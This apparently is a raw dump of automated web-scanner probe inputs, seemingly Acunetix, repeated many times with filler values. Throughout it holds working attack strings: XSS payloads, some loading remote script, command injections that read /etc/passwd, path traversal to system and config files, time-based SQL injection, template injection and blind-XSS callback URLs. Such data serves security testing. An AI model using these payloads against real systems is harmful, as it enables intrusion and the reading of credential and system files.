1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962681></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(957894)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(986627)">

1

"&cat /etc/passwd&"

1

1

if(now()=sysdate(),sleep(11.157),0)/*'XOR(if(now()=sysdate(),sleep(11.157),0))OR'"XOR(if(now()=sysdate(),sleep(11.157),0))OR"*/

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(967686)"></g></svg>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF\web.xml

1

1

cat /etc/passwd

(select(0)from(select(sleep(11.157)))v)/*'+(select(0)from(select(sleep(11.157)))v)+'"+(select(0)from(select(sleep(11.157)))v)+"*/

${99041+100118}

1<div style=width:expression(prompt(988422))>

1

1&n934799=v911044

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

1

1<iframe src='data:text/html

`cat /etc/passwd`

-1

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1)

1<body onload=prompt(976127)>

!(()&&!|*|*|

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

^(#$!@#$)(()))******

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947001)>

-1))

'

"|"ld

1

'"()

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"

1<img src=xyz OnErRor=prompt(977860)>

p5VlFt6J'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

'

mxzqBMBq')

1<img/src=">" onerror=alert(976461)>

1

${@print(md5(acunetix_wvs_security_test))}

1

"

1

/etc/passwd

1

1

KwftZ7TR'))

1<ScRiPt%20>prompt(940481)</sCripT>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1&lt

1

-1

1

1

acunetix_wvs_invalid_filename

1

1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

\xf6<img acu onmouseover=prompt(969268) //\xf6>

1

1

http://hitpwGRVFRVkg.bxss.me/

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

1

1<input autofocus onfocus=prompt(974747)>

T4McNYll'

1

1

"&dir&"

1

comments/.

http://www.acunetix.tst

'"

<a href='http://www.acunetix.com'>website security</a>

yo5t2TRE')

|dir

1

1'"()&%<ScRiPt >prompt(993595)</ScRiPt>

file:///etc/passwd

1

uhvIAlhM'))

<!--

[url=http://www.acunetix.com]website security[/url]

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'"()&%<ScRiPt >prompt(955396)</ScRiPt>

'|dir

1

1

1_bOzSH <ScRiPt >prompt(935730)</ScRiPt>

1

WEB-INF/web.xml

"|dir

1

1_921973

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acu9408\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9408

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acux1827\xc0\xbez1\xc0\xbcz2a\x90bcxuca1827

1

1

1

1<ScRiPt >prompt(922427)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<script>prompt(973823)</script>

1

1

1

1<ScRiPt >prompt(923479)</ScRiPt>

WEB-INF/web.xml

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?993570></ScRiPt>

1

WEB-INF\web.xml

1

1<ScRiPt >prompt(938872)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(950533)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973962)"></g></svg>

1

1

1<div style=width:expression(prompt(934885))>

1

1

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(960882)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934979)>

1

1<img src=xyz OnErRor=prompt(994664)>

1

1<img/src=">" onerror=alert(915828)>

1

1<ScRiPt%20>prompt(957858)</sCripT>

1

1&lt

\xf6<img acu onmouseover=prompt(915003) //\xf6>

1

1<input autofocus onfocus=prompt(977763)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_854BK <ScRiPt >prompt(908617)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9634484*9947830)

'+response.write(9634484*9947830)+'

&cat /etc/passwd&

1

"+response.write(9634484*9947830)+"

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

${99185+99714}

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"|"ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n982887=v998171

)

1some_inexistent_file_with_long_name%00.jpg

-1)

1

'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

"

^(#$!@#$)(()))******

mry6A12H'

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

||cat /etc/passwd

X73W9GJe')

/etc/passwd

1

1

&dir

mBTV2sIP'))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

1

-1)

1

"

"&dir&"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

-1))

http://hitJ9TZcz9BHM.bxss.me/

1

|dir

comments

TPAU9NG9'

${@print(md5(acunetix_wvs_security_test))}\

1

1

'|dir

comments

file:///etc/passwd

aE9sAW5Z')

'"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

Z4lDc3Mg'))

comments/.

<!--

1

WEB-INF/web.xml

1

1

1

1

1

1

1'"()&%<ScRiPt >prompt(906753)</ScRiPt>

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

'"()&%<ScRiPt >prompt(928388)</ScRiPt>

1

1

1

1

1_906040

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acu2267\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2267

1

1

1

acux6477\xc0\xbez1\xc0\xbcz2a\x90bcxuca6477

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(951287)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9890480*9607340)

1<script>prompt(946027)</script>

'+response.write(9890480*9607340)+'

1

1

1<ScRiPt >prompt(973759)</ScRiPt>

1

1

"+response.write(9890480*9607340)+"

WEB-INF/web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?991461></ScRiPt>

1

&cat /etc/passwd&

1

WEB-INF\web.xml

1<ScRiPt >prompt(917719)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<video><source onerror="javascript:prompt(978265)">

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998845)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<div style=width:expression(prompt(974737))>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

${99168+99631}

-1

1

1

1<iframe src='data:text/html

1some_inexistent_file_with_long_name%00.jpg

1&n929524=v904414

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<body onload=prompt(922862)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1))

!(()&&!|*|*|

testasp.vulnweb.com

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950864)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

JWF8trHh'

^(#$!@#$)(()))******

'"()

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(924030)>

1

'

1

1

1

"|"ld

1

wyn4xU6t')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

1<img/src=">" onerror=alert(928065)>

/etc/passwd

scuyzjj8'))

1

acunetix_wvs_invalid_filename

1

1<ScRiPt%20>prompt(962404)</sCripT>

1

1

${@print(md5(acunetix_wvs_security_test))}

-1

1

comments

http://hitdD7mALJPmn.bxss.me/

'

1&lt

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

"

\xf6<img acu onmouseover=prompt(915143) //\xf6>

1

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'"

http://www.acunetix.tst

-1))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1'"()&%<ScRiPt >prompt(938244)</ScRiPt>

comments/.

||cat /etc/passwd

1<input autofocus onfocus=prompt(955526)>

<!--

1

BXRDjGzU'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

<a href='http://www.acunetix.com'>website security</a>

1

1

'"()&%<ScRiPt >prompt(941975)</ScRiPt>

1

lVXuUkky')

1

[url=http://www.acunetix.com]website security[/url]

file:///etc/passwd

'&dir&'

1

1

1_977418

response.write(9256465*9938286)

1

gIzSDjY1'))

1_pHbvH <ScRiPt >prompt(917576)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1

1

1

'+response.write(9256465*9938286)+'

1

1

1

|dir

WEB-INF/web.xml

"+response.write(9256465*9938286)+"

1

1

1

1

'|dir

1

WEB-INF\web.xml

&cat /etc/passwd&

1

1

1

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini

"|dir

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../boot.ini

1

1

cat /etc/passwd

1

acu4926\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4926

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

${100034+99505}

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

acux6866\xc0\xbez1\xc0\xbcz2a\x90bcxuca6866

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

1

1

1

1<ScRiPt >prompt(921536)</ScRiPt>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

................windowswin.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<script>prompt(990659)</script>

1

1

1&n902057=v961757

..\..\..\..\..\..\..\..\windows\win.ini

'|'ld

1some_inexistent_file_with_long_name%00.jpg

-1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<ScRiPt >prompt(939209)</ScRiPt>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

"|"ld

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

)

testasp.vulnweb.com

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929936></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1))

1

1<ScRiPt >prompt(912342)</ScRiPt>

1

1

1

^(#$!@#$)(()))******

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(980744)">

EDZMaCbr'

/etc/passwd

'

1

1

1

1

1

"

GuHNY6a9')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981989)"></g></svg>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(935907))>

||cat /etc/passwd

GR5nvOrF'))

1

1

WEB-INF\web.xml

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<iframe src='data:text/html

-1

&dir

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<body onload=prompt(917860)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

'&dir&'

'"()

'

-1)

1

comments

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997602)>

1

1

1

-1))

"&dir&"

"

1

1

http://hitrHs7LKTlM6.bxss.me/

file:///etc/passwd

1<img src=xyz OnErRor=prompt(948771)>

comments

FWE4HsyP'

|dir

1

${@print(md5(acunetix_wvs_security_test))}

1

/\../\../\../\../\../\../\../etc/passwd

m2eOVrxz')

comments/.

1<img/src=">" onerror=alert(920655)>

1

1

'|dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

WEB-INF/web.xml

1

1

1

1<ScRiPt%20>prompt(995797)</sCripT>

kJBCvAp7'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

"|dir

1

1

WEB-INF\web.xml

1

1&lt

1

1

1

http://www.acunetix.tst

1

1

1

'"

1

\xf6<img acu onmouseover=prompt(919081) //\xf6>

1

1

1'"()&%<ScRiPt >prompt(978919)</ScRiPt>

<!--

1

1<input autofocus onfocus=prompt(991178)>

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(995737)</ScRiPt>

1

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1_952511

[url=http://www.acunetix.com]website security[/url]

1

../../../../../../../../../../boot.ini

1

1

1

response.write(9193354*9297742)

1_5rcDC <ScRiPt >prompt(906941)</ScRiPt>

&cat /etc/passwd&

1

1

'+response.write(9193354*9297742)+'

1

../../../../../../../../../../windows/win.ini.jpg

1

"+response.write(9193354*9297742)+"

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

................windowswin.ini

1

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

acu6663\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6663

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

acux9290\xc0\xbez1\xc0\xbcz2a\x90bcxuca9290

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

${100486+100354}

1

1<ScRiPt >prompt(904469)</ScRiPt>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"|"ld

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<script>prompt(941703)</script>

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1&n961945=v973193

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<ScRiPt >prompt(901820)</ScRiPt>

'

-1

WEB-INF/web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

-1)

"

)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?941086></ScRiPt>

1

-1))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF\web.xml

1

1

1

||cat /etc/passwd

1<ScRiPt >prompt(991089)</ScRiPt>

!(()&&!|*|*|

kAdF1Wk7'

1

&dir

1

1

/etc/passwd

1

'&dir&'

xECia7ha')

1

^(#$!@#$)(()))******

1<video><source onerror="javascript:prompt(975877)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980735)"></g></svg>

wKmZtDY8'))

"&dir&"

1

'"()

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1<div style=width:expression(prompt(977696))>

|dir

1

1

-1

1

1<iframe src='data:text/html

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1)

1

1

'|dir

1<body onload=prompt(971815)>

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1))

"|dir

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973003)>

http://hitHH7Wr55bAB.bxss.me/

acunetix_wvs_invalid_filename

"

1

file:///etc/passwd

eV2rVa6G'

1

1

${@print(md5(acunetix_wvs_security_test))}

comments

1<img src=xyz OnErRor=prompt(986313)>

1

1

1

oowFOKUL')

/\../\../\../\../\../\../\../etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1<img/src=">" onerror=alert(971258)>

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

WEB-INF/web.xml

1

dERbGV25'))

1

1

http://www.acunetix.tst

1

comments/.

1<ScRiPt%20>prompt(912183)</sCripT>

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(919732)</ScRiPt>

1

'"

1

1

1

1

../../../../../../../../../../windows/win.ini

1&lt

1

1

1

'"()&%<ScRiPt >prompt(939076)</ScRiPt>

<!--

\xf6<img acu onmouseover=prompt(920326) //\xf6>

../../../../../../../../../../boot.ini

1

1

1_961952

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<input autofocus onfocus=prompt(964519)>

1

1

response.write(9382836*9355340)

1

1

1

&cat /etc/passwd&

<a href='http://www.acunetix.com'>website security</a>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'+response.write(9382836*9355340)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

[url=http://www.acunetix.com]website security[/url]

1

"+response.write(9382836*9355340)+"

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

acu3019\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3019

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1_A3CvB <ScRiPt >prompt(984398)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

cat /etc/passwd

1

acux1255\xc0\xbez1\xc0\xbcz2a\x90bcxuca1255

1

1

1

1

1

1

`cat /etc/passwd`

1<ScRiPt >prompt(936935)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

1

|cat /etc/passwd#

1<script>prompt(931729)</script>

1

../../../../../../../../../../etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'|'ld

1

1

1<ScRiPt >prompt(984483)</ScRiPt>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

${100199+99287}

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995278></ScRiPt>

1

1

"|"ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

-1

1

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(956855)</ScRiPt>

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1&n982094=v993310

1<video><source onerror="javascript:prompt(984333)">

-1))

1

1

WEB-INF/web.xml

'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902986)"></g></svg>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1KETJAeF'

"

)

WEB-INF\web.xml

1

1

iVxJrEoc')

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<div style=width:expression(prompt(903627))>

BiZMYplt'))

1

1

||cat /etc/passwd

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<iframe src='data:text/html

1

-1

&dir

^(#$!@#$)(()))******

1

1

-1)

1

1

1<body onload=prompt(926585)>

/etc/passwd

1

1

'"()

'&dir&'

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993247)>

-1))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"&dir&"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

83BRsXnK'

1<img src=xyz OnErRor=prompt(934872)>

1

1

|dir

'

1

1

1<img/src=">" onerror=alert(929557)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

XUmMMvPz')

1<ScRiPt%20>prompt(943465)</sCripT>

'|dir

"

http://hit9kZIMnVrnh.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

SNiuF13R'))

1&lt

1

"|dir

comments

${@print(md5(acunetix_wvs_security_test))}

1

\xf6<img acu onmouseover=prompt(935962) //\xf6>

file:///etc/passwd

1

1

1

1<input autofocus onfocus=prompt(987792)>

${@print(md5(acunetix_wvs_security_test))}\

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'"

<a href='http://www.acunetix.com'>website security</a>

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

<!--

1

comments/.

1

WEB-INF/web.xml

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

1'"()&%<ScRiPt >prompt(986532)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1_Ejga0 <ScRiPt >prompt(988886)</ScRiPt>

1

'"()&%<ScRiPt >prompt(903158)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

1

response.write(9292028*9603156)

1_963128

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

'+response.write(9292028*9603156)+'

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9292028*9603156)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd

................windowswin.ini

1

1

1

